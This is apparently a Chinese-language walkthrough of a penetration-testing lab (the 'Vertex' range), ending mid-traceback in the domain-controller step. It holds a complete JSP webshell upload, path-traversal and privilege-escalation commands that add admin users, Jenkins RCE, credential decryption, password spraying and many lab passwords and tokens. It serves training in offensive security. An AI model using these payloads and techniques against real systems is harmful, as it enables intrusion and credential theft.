Vertex

Pasted image 20260122183208.png
在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估 VertexSoft 科技有限公司的网络安全。VertexSoft 是一家专注于互联网与信息技术领域的领先公司,该公司致力于为客户提供卓越的数字解决方案,以满足各种业务需求。 您的任务是首先入侵公司在公网上暴露的应用程序,然后运用后渗透技巧深入 VertexSoft 公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务。最终的目标是接管域控制器,从而控制整个内部网络。靶场中共设置了8个Flag,它们分布在不同的靶机上,您需要找到并获取这些Flag作为您的成就目标。

1. flag01

1.1. 信息收集


┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 8.130.151.6
┌──────────────────────────────────────────────┐   ___                              _      / _ \     ___  ___ _ __ __ _  ___| | __  / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__|   <    \____/     |___/\___|_|  \__,_|\___|_|\_\   
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[796ms]     已选择服务扫描模式
[796ms]     开始信息扫描
[796ms]     最终有效主机数量: 1
[796ms]     开始主机扫描
[796ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[796ms]     有效端口数量: 233
[846ms] [*] 端口开放 8.130.146.255:80
[894ms] [*] 端口开放 8.130.146.255:135
[894ms] [*] 端口开放 8.130.146.255:1433
[897ms] [*] 端口开放 8.130.146.255:139
[902ms] [*] 端口开放 8.130.146.255:8172
[921ms] [*] 端口开放 8.130.146.255:8000
[3.8s]     扫描完成, 发现 6 个开放端口
[3.8s]     存活端口数量: 6
[3.8s]     开始漏洞扫描
[3.9s]     POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 http://8.130.146.255      状态码:200 长度:43679  标题:VertexSoft
[4.0s] [*] NetInfo 扫描结果
目标主机: 8.130.146.255
主机名: WIN-IISSERER
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.9
[4.3s] [*] 网站标题 http://8.130.146.255:8000 状态码:200 长度:4018   标题:Modbus Monitor - VertexSoft Internal Attendance System
[5.4s] [*] 网站标题 https://8.130.146.255:8172 状态码:404 长度:0      标题:无标题
[30.4s]     扫描已完成: 9/9

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 39.101.67.71
┌──────────────────────────────────────────────┐   ___                              _      / _ \     ___  ___ _ __ __ _  ___| | __  / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__|   <    \____/     |___/\___|_|  \__,_|\___|_|\_\   
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[890ms]     已选择服务扫描模式
[890ms]     开始信息扫描
[890ms]     最终有效主机数量: 1
[890ms]     开始主机扫描
[890ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[890ms]     有效端口数量: 233
[950ms] [*] 端口开放 39.101.67.71:22
[987ms] [*] 端口开放 39.101.67.71:8080
[3.9s]     扫描完成, 发现 2 个开放端口
[3.9s]     存活端口数量: 2
[3.9s]     开始漏洞扫描
[3.9s]     POC加载完成: 总共387个,成功387个,失败0个
[4.6s] [*] 网站标题 http://39.101.67.71:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A
[5.0s] [*] 网站标题 http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A 状态码:200 长度:1383   标题:Master ERP login Form
[10.1s] [+] 目标: http://39.101.67.71:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        参考链接:https://github.com/LandGrey/SpringBootVulExploit
[46.4s]     扫描已完成: 3/3
IP: 39.101.67.71
端口: 22, 服务: SSH
端口: 8080, 服务: HTTP (服务: Master ERP)
漏洞: SpringBoot Env 未授权访问

1.2. SpringBoot 未授权 heapdump

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://39.101.67.71:8080 -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/ChunQiu/Vertex/reports/http_39.101.67.71_8080/_26-01-22_06-17-58.txt

Target: http://39.101.67.71:8080/

[06:17:58] Starting: 
[06:18:02] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[06:18:03] 400 -  435B  - /a%5c.aspx
[06:18:03] 200 -    2KB - /actuator
[06:18:03] 200 -   20B  - /actuator/caches
[06:18:03] 200 -    6KB - /actuator/env
[06:18:03] 200 -  167B  - /actuator/health
[06:18:04] 200 -   91KB - /actuator/beans
[06:18:04] 200 -   99KB - /actuator/conditions
[06:18:04] 200 -    2B  - /actuator/info
[06:18:04] 200 -   54B  - /actuator/scheduledtasks
[06:18:04] 200 - 1018B  - /actuator/metrics
[06:18:04] 200 -   22KB - /actuator/mappings
[06:18:04] 200 -   14KB - /actuator/configprops
[06:18:04] 200 -   50KB - /actuator/loggers
[06:18:04] 200 -   71KB - /actuator/threaddump
>>>> [06:18:04] 200 -   33MB - /actuator/heapdump
[06:18:18] 200 -    1KB - /login
[06:18:18] 200 -    1KB - /login/

Task Completed

1.3. shiro

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = Hl5LLC0EpW3KCUJrbe/FIQ==, algName = AES
/ >cat flag.txt

████████ ███████   ███████ 
░██░░░░░ ░██░░░░██ ░██░░░░██
░██      ░██   ░██ ░██   ░██
░███████ ░███████  ░███████ 
░██░░░░  ░██░░░██  ░██░░░░  
░██      ░██  ░░██ ░██      
░████████░██   ░░██░██      
░░░░░░░░ ░░     ░░ ░░       


flag{98e9c5e5-eb81-477a-8704-c81a116a6ef7}

2. flag02

IP: 8.145.32.249
主机名: WIN-IISSERER (内网IP: 192.168.8.9)
端口: 80, 服务: HTTP (标题: VertexSoft)
端口: 135, 服务: RPC
端口: 139, 服务: NetBIOS
端口: 1433, 服务: MSSQL
端口: 8000, 服务: HTTP (标题: Modbus Monitor - VertexSoft Internal Attendance System)
端口: 8172, 服务: HTTPS

2.1. 信息收集

80是一个静态网站

8000是一个考勤系统

可以被抓包修改注册用户的角色
Pasted image 20260122194103.png

export list可以获取到管理员的密码A1m!n@Qsx1Jn
Pasted image 20260122194255.png

2.2. 任意文件下载

观察这个下载文件的url,感觉可以下载任意文件

http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=users.csv

考虑到目标是ASP.NET网站,下载web.config

http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=../web.Config

这里因为IIS的限制,不允许下载.config文件,可以使用大写绕过

web.config中可以获取到mssql的账号密码

  <connectionStrings>
    <add
      name="UserModel"
>>>>       connectionString="data source=127.0.0.1;initial catalog=GuestDB;persist security info=True;user id=sa;password=Sa1pYbSM!dsQ;MultipleActiveResultSets=True;App=EntityFramework"
      providerName="System.Data.SqlClient"
    />
  </connectionStrings>

2.3. msssql

Pasted image 20260122195418.png
直接就是dba权限

目标不出网
Pasted image 20260122201810.png

传一个免杀shell上线
Pasted image 20260122202156.png

然后再传一个免杀的土豆创建一个管理员用户

beacon> shell C:\Users\Public\sp.exe -a "net localgroup administrators c1trus /add"
beacon> shell C:\Users\Public\sp.exe -a "net user c1trus Admin123 /add "

进去后就给df关了
Pasted image 20260122204807.png

Pasted image 20260122205012.png

flag{0079eeec-664d-4ee4-8099-b8907ee7a51f}

3. 内网代理

3.1. windows入口机

C:\Users\c1trus\Desktop>fscan -h 192.168.8.9/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[2.5s]     已选择服务扫描模式
[2.5s]     开始信息扫描
[2.5s]     CIDR范围: 192.168.8.0-192.168.8.255
[2.5s]     generate_ip_range_full
[2.5s]     解析CIDR 192.168.8.9/24 -> IP范围 192.168.8.0-192.168.8.255
[2.5s]     最终有效主机数量: 256
[2.5s]     开始主机扫描
[2.5s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[2.6s] [*] 目标 192.168.8.12    存活 (ICMP)
[2.6s] [*] 目标 192.168.8.146   存活 (ICMP)
[2.6s] [*] 目标 192.168.8.16    存活 (ICMP)
[2.6s] [*] 目标 192.168.8.253   存活 (ICMP)
[2.7s] [*] 目标 192.168.8.26    存活 (ICMP)
[2.7s] [*] 目标 192.168.8.38    存活 (ICMP)
[2.7s] [*] 目标 192.168.8.42    存活 (ICMP)
[2.7s] [*] 目标 192.168.8.9     存活 (ICMP)
[5.6s]     存活主机数量: 8
[5.6s]     有效端口数量: 233
[5.6s] [*] 端口开放 192.168.8.12:88
[5.6s] [*] 端口开放 192.168.8.12:139
[5.6s] [*] 端口开放 192.168.8.12:135
[5.6s] [*] 端口开放 192.168.8.16:445
[5.6s] [*] 端口开放 192.168.8.16:135
[5.6s] [*] 端口开放 192.168.8.16:139
[5.6s] [*] 端口开放 192.168.8.146:22
[5.6s] [*] 端口开放 192.168.8.16:8080
[5.6s] [*] 端口开放 192.168.8.146:8080
[5.6s] [*] 端口开放 192.168.8.12:445
[5.6s] [*] 端口开放 192.168.8.12:389
[7.7s] [*] 端口开放 192.168.8.26:445
[7.7s] [*] 端口开放 192.168.8.26:139
[7.7s] [*] 端口开放 192.168.8.26:135
[8.2s] [*] 端口开放 192.168.8.26:8080
[8.6s] [*] 端口开放 192.168.8.38:445
[8.6s] [*] 端口开放 192.168.8.38:139
[8.6s] [*] 端口开放 192.168.8.38:135
[9.7s] [*] 端口开放 192.168.8.38:3306
[17.0s] [*] 端口开放 192.168.8.42:8060
[17.0s] [*] 端口开放 192.168.8.42:80
[17.0s] [*] 端口开放 192.168.8.42:22
[17.0s] [*] 端口开放 192.168.8.9:8000
[17.0s] [*] 端口开放 192.168.8.9:1433
[17.0s] [*] 端口开放 192.168.8.9:445
[17.0s] [*] 端口开放 192.168.8.9:139
[17.0s] [*] 端口开放 192.168.8.9:135
[17.0s] [*] 端口开放 192.168.8.9:80
[17.0s] [*] 端口开放 192.168.8.42:9094
[17.0s] [*] 端口开放 192.168.8.9:8172
[17.0s]     扫描完成, 发现 30 个开放端口
[17.0s]     存活端口数量: 30
[17.0s]     开始漏洞扫描
[17.1s]     POC加载完成: 总共387个,成功387个,失败0个
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.9
主机名: WIN-IISSERER
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.9
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.38
主机名: WIN-OPS88
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.38
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.16
主机名: WIN-SERVER03
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.16
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.26
主机名: WIN-PC3788
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.26
[17.3s] [*] NetInfo 扫描结果
目标主机: 192.168.8.12
主机名: RODC
发现的网络接口:
   IPv4地址:
      └─ 192.168.8.12
[17.4s] [+] NetBios 192.168.8.16    WORKGROUP\WIN-SERVER03
[17.5s] [+] NetBios 192.168.8.12    DC:VERTEXSOFT\RODC
[17.5s] [*] 网站标题 http://192.168.8.9        状态码:200 长度:43679  标题:VertexSoft
[17.6s] [+] NetBios 192.168.8.38    WORKGROUP\WIN-OPS88
[17.6s] [+] NetBios 192.168.8.26    WORKGROUP\WIN-PC3788
[17.6s] [*] 网站标题 http://192.168.8.42       状态码:302 长度:99     标题:无标题 重定向地址: http://192.168.8.42/users/sign_in
[17.6s] [*] 网站标题 http://192.168.8.146:8080 状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA
[17.6s] [*] 网站标题 http://192.168.8.42:8060  状态码:404 长度:555    标题:404 Not Found
[17.6s] [*] 网站标题 https://192.168.8.9:8172  状态码:404 长度:0      标题:无标题
[18.0s] [*] 网站标题 http://192.168.8.26:8080  状态码:200 长度:147    标题:第一个 JSP 程序
[18.2s] [*] 网站标题 http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA 状态码:200 长度:1383   标题:Master ERP login Form
[19.3s] [*] 网站标题 http://192.168.8.16:8080  状态码:403 长度:594    标题:无标题
[19.5s] [*] 网站标题 http://192.168.8.42/users/sign_in 状态码:200 长度:11166  标题:登录 · GitLab
[22.0s] [+] MySQL 192.168.8.38:3306 root 123456
[22.3s] [*] 网站标题 http://192.168.8.9:8000   状态码:200 长度:4018   标题:Modbus Monitor - VertexSoft Internal Attendance System
[23.7s] [+] 目标: http://192.168.8.146:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        参考链接:https://github.com/LandGrey/SpringBootVulExploit
IP: 192.168.8.9 (入口机)
端口: 80, 服务: HTTP (站点: VertexSoft)
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 1433, 服务: MSSQL
端口: 8000, 服务: HTTP (Modbus Monitor - VertexSoft Internal Attendance System)
端口: 8172, 服务: HTTPS


IP: 192.168.8.12
主机名: RODC
角色: 域控制器 (DC)
端口: 88, 服务: Kerberos
端口: 389, 服务: LDAP
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC


IP: 192.168.8.16
主机名: WIN-SERVER03
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP


IP: 192.168.8.26
主机名: WIN-PC3788
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP 


IP: 192.168.8.38
主机名: WIN-OPS88
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 3306, 服务: MySQL  root 123456

IP: 192.168.8.42
端口: 22, 服务: SSH
端口: 80, 服务: HTTP
端口: 8060, 服务: HTTP
端口: 9094, 服务: 未知
应用: GitLab
访问地址: http://192.168.8.42/users/sign_in

IP: 192.168.8.146 (入口机)
端口: 22, 服务: SSH
端口: 8080, 服务: HTTP (应用: Master ERP)
漏洞: SpringBoot Env 未授权访问
C:\Users\c1trus\Desktop>agent.exe -bind 0.0.0.0:5555 -ignore-cert


┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ligolo-proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
WARN[0000] TLS Certificate fingerprint for ligolo is: 077B13423C087EC4498E36E925B82784969E4612FBEE3969DC6385FDEBDA31B5
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: dev

ligolo-ng » connect_agent --ip 8.145.32.249:5555
? TLS Certificate Fingerprint is: 09DCC2BC11F6EF6F288E04162C3D70090BF7EA0D6E95DF7B4750F54C5345175B, connect? Yes
INFO[0023] Agent connected.                              id=00163e01a629 name="WIN-IISSERER\\c1trus@WIN-IISSERER" remote="8.145.32.249:5555"
ligolo-ng » 

4. flag03 192.168.8.26

Pasted image 20260122211059.png

4.1. CVE-2017-12615 Tomcat put 文件上传

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://192.168.8.26:8080/ -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/ChunQiu/Vertex/reports/http_192.168.8.26_8080/__26-01-22_08-11-08.txt

Target: http://192.168.8.26:8080/

[08:11:08] Starting: 
[08:11:15] 400 -  795B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:11:16] 400 -  795B  - /a%5c.aspx
[08:11:22] 302 -    0B  - /backup  ->  /backup/
[08:11:22] 200 -  138B  - /backup/

Task Completed

wp说是这个洞,但也没说为什么看出来的,我也没看出来

这里照着上传一个webshell

PUT /backup/upload/sim.jsp HTTP/1.1
Host: 192.168.8.26:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*
;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A377FCF0DA5A1767C46C7478027926F9; JSESSIONID=0F908F3AE0576C6145257C8E9395272C
Connection: close
Content-Length: 956

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

Pasted image 20260122212939.png

4.2. 上线 土豆提权

目标没有杀软
直接传一个beacon上线
Pasted image 20260122213334.png

C:\apache-tomcat-8.5.71> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
>>>> SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

用deadpotato上线system
Pasted image 20260122213649.png

[01/22 21:37:45] beacon> shell type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [*] Tasked beacon to run: type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [+] host called home, sent: 72 bytes
[01/22 21:37:52] [+] received output:
W     W III N   N     PPPP   CCC 333  77777  888   888  
W     W  I  NN  N     P   P C       3    7  8   8 8   8 
W  W  W  I  N N N --- PPPP  C     33    7    888   888  
 W W W   I  N  NN     P     C       3   7   8   8 8   8 
  W W   III N   N     P      CCC 333    7    888   888  


	flag{c37b368f-8585-47d7-adf2-0c04c8ef30a3}

5. flag04 192.168.8.16

IP: 192.168.8.16
主机名: WIN-SERVER03
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP

5.1. jenkins 弱口令

admin / admin123弱口令后台rce Jenkins

Pasted image 20260122214707.png
但是我们是system权限,直接创建一个本地管理员然后rdp上去

println "net user c2trus Admin123 /add".execute().text
println "net localgroup administrators c2trus  /add".execute().text

Pasted image 20260122220831.png

  _          ____  ____  ____  ____  _ __ 
 / |   ____ |__  ||_  _||    ||__  || |  \
| |__ |____| _/ /  /  \ ||_| | _/ / | || |
 \___|      |____||_/\_||_||_||____|\__|_|


flag{8bef2d26-91a8-481d-a883-cfd3b0e2ce5a}

6. flag05 192.168.8.42

IP: 192.168.8.42
端口: 22, 服务: SSH
端口: 80, 服务: HTTP
端口: 8060, 服务: HTTP
端口: 9094, 服务: 未知
应用: GitLab
访问地址: http://192.168.8.42/users/sign_in

6.1. gitlab

Pasted image 20260122221535.png

从jenkins的credentials.xml中可以获取到gitlab的api token

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1361.v56f5ca_35d21c">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
>>>>         <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.8.1">
          <scope>GLOBAL</scope>
          <id>84bc6224-fa06-489e-b746-f5dedb11a235</id>
          <description></description>
>>>>           <apiToken>{AQAAABAAAAAgqoi+w8f2N/rXi0qZEha5nGPamO0CIjokzT/a64spCEBqrIv7dFOC/dVxZwp+6CCU}</apiToken>
>>>>         </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

参考 jenkins 凭证解密解密即可

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml
[
  {
    "apiToken": "glpat-2Z7YFA6k57s93VHMvHxh",
    "id": "84bc6224-fa06-489e-b746-f5dedb11a235",
    "scope": "GLOBAL"
  }
]

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# curl --header "PRIVATE-TOKEN:glpat-2Z7YFA6k57s93VHMvHxh" "http://192.168.8.42/api/v4/projects"| jq '.[].name'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21051 100 21051   0     0 53354     0  --:--:-- --:--:-- --:--:-- 53428
"VertexSoftBackup"
"Hexo"
"VertexApp"
"ERP_Old"
"PortalCode"

有五个项目

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# git clone http://192.168.8.42:glpat-2Z7YFA6k57s93VHMvHxh@192.168.8.42/vertexsoft/vertexsoftbackup.git
Cloning into 'vertexsoftbackup'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 3
Receiving objects: 100% (6/6), done.


┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# ls
backup.txt  README.md

┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# cat backup.txt
 ██████╗ ██╗████████╗██╗      █████╗ ██████╗
██╔════╝ ██║╚══██╔══╝██║     ██╔══██╗██╔══██╗
██║  ███╗██║   ██║   ██║     ███████║██████╔╝
██║   ██║██║   ██║   ██║     ██╔══██║██╔══██╗
╚██████╔╝██║   ██║   ███████╗██║  ██║██████╔╝
 ╚═════╝ ╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝╚═════╝

flag{7bc76381-d76e-45af-99d6-9ac19baabf53}                                                                                      

7. flag06 192.168.8.38

IP: 192.168.8.38
主机名: WIN-OPS88
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 3306, 服务: MySQL
弱口令: MySQL root / 123456

7.1. mysql弱口令

直接创建管理员用户梭哈
Pasted image 20260122230123.png

这台机器是真几把卡,数据库连半天,rdp登半天

db   d8b   db d888888b d8b   db         .d88b.  d8888b. .d8888. .d888b. .d888b. 
88   I8I   88   `88'   888o  88        .8P  Y8. 88  `8D 88'  YP 88   8D 88   8D 
88   I8I   88    88    88V8o 88        88    88 88oodD' `8bo.   `VoooY' `VoooY' 
Y8   I8I   88    88    88 V8o88 C8888D 88    88 88~~~     `Y8b. .d~~~b. .d~~~b. 
`8b d8'8b d8'   .88.   88  V888        `8b  d8' 88      db   8D 88   8D 88   8D 
 `8b8' `8d8'  Y888888P VP   V8P         `Y88P'  88      `8888Y' `Y888P' `Y888P' 


		flag{0d9d3afa-8c5c-43ca-8799-6b84355823c5}

Pasted image 20260122230435.png

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ping 192.168.8.38
PING 192.168.8.38 (192.168.8.38) 56(84) bytes of data.
64 bytes from 192.168.8.38: icmp_seq=1 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=2 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=3 ttl=64 time=111 ms
^C
--- 192.168.8.38 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 110.278/110.470/110.810/0.240 ms

延迟也不高啊,卡的批爆

8. flag07 192.168.8.12

IP: 192.168.8.12
主机名: RODC
角色: 域控制器 (DC)
端口: 88, 服务: Kerberos
端口: 389, 服务: LDAP
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC

在192.168.3.38 mysql这台机器的c:\users\administrator\documents\下可以发现一个密码本ROAdmins.xlsx
Pasted image 20260122231051.png

8.1. 密码喷洒

Username	Password
IsabellaTech	Nt5w0V4?Ff
LucasEther	ur4aLwo!bB
NathanZen	rXjfpYRn?Q
VictoriaVoid	4cd0?8euR6
SamuelStorm	UzVXrDJ@B6
OliviaVoid	Usq0gV!D52
MargaretStorm	GbK3p!rDJE
CharlieCloud	u!6vDaGQOA

全都是有效的只是密码过期了。

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u user.txt -p pass.txt --no-bruteforce --continue-on-success
SMB         192.168.8.12    445    RODC             [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\LucasEther:ur4aLwo!bB STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\NathanZen:rXjfpYRn?Q STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\VictoriaVoid:4cd0?8euR6 STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\SamuelStorm:UzVXrDJ@B6 STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\OliviaVoid:Usq0gV!D52 STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\MargaretStorm:GbK3p!rDJE STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\CharlieCloud:u!6vDaGQOA STATUS_PASSWORD_EXPIRED
SMB         192.168.8.12    445    RODC             [+] vertexsoft.local\:

改下密码,然后抓bloodhound看看哪个用户比较有价值

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# bloodyAD --host 192.168.8.12 -d vertexsoft.local -u IsabellaTech -p 'Nt5w0V4?Ff' set password ADAM.SILVER Admin123
Traceback (most recent call last):
  File "/root/.local/bin/bloodyAD", line 10, in <module>
    sys.exit(main())
             ^^^^^^
  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 342, in main
    asyncio.run(amain())
  File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 195, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/base_events.py", line 691, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 272, in amain
    output = await result
             ^^^^^^^^^^^^
